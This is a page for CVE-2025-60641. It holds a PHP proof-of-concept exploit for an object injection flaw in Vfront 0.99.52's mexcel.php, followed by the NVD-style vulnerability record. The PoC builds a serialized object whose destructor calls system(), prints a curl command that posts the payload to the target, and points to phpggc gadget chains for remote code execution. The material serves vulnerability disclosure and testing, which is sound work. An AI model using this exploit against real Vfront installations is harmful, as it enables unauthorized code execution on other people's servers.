CVE-2025-60641

<?php /** * CVE-2025-60641 - Vfront 0.99.52 PHP Object Injection PoC * Vulnerability: Unsafe unserialize() in mexcel.php * * This PoC demonstrates how to craft a malicious serialized payload * that exploits the unsafe unserialize() call in mexcel.php. * * Usage: * 1. Generate payload: php poc.php * 2. Send the output as POST parameter 'mexcel' to mexcel.php */ // Example: Simple PHP Object Injection payload // In a real scenario, you would use a gadget chain from // the application's dependencies (e.g., Monolog, Guzzle, etc.) class ExploitObject { public $command; public function __destruct() { // This will be triggered automatically during unserialization cleanup // In real exploitation, this would be replaced with a gadget chain // that leads to code execution if (isset($this->command)) { system($this->command); } } } // Step 1: Create the malicious object $payload = new ExploitObject(); $payload->command = "id; whoami"; // Command to execute // Step 2: Serialize the object $serialized = serialize($payload); // Step 3: Base64 encode the serialized data $encoded = base64_encode($serialized); echo "[*] CVE-2025-60641 PoC Payload\n"; echo "[*] Serialized: " . $serialized . "\n"; echo "[*] Base64 Encoded: " . $encoded . "\n"; echo "[*] Send as POST parameter 'mexcel' to the vulnerable mexcel.php\n"; echo "\n[*] Example curl command:\n"; echo "curl -X POST -d 'mexcel=" . $encoded . "' http://target/vfront/mexcel.php\n"; // Alternative: Using existing PHP gadget chains (e.g., from phpggc) // phpggc -l monolog/rce1 -b -u "id" // The output can be sent as the 'mexcel' parameter ?> <?php /** * Alternative PoC using curl directly with a known gadget chain * Requires phpggc tool: https://github.com/ambionics/phpggc * * Generate payload: * phpggc monolog/rce1 system 'id' -b * * Then send: * curl -X POST --data-urlencode "mexcel=<BASE64_PAYLOAD>" http://target/mexcel.php */ ?>

{"cve": {"id": "CVE-2025-60641", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:37.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The file mexcel.php in the Vfront 0.99.52 codebase contains a vulnerable call to unserialize(base64_decode($_POST['mexcel'])), where $_POST['mexcel'] is user-controlled input. This input is decoded from base64 and deserialized without validation or use of the allowed_classes option, allowing an attacker to inject arbitrary PHP objects. This can lead to malicious behavior, such as Remote Code Execution (RCE), SQL Injection, Path Traversal, or Denial of Service, depending on the availability of exploitable classes in the Vfront codebase or its dependencies."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://vfront.com", "source": "[email protected]"}, {"url": "https://xancatos.org/cve202560641", "source": "[email protected]"}]}}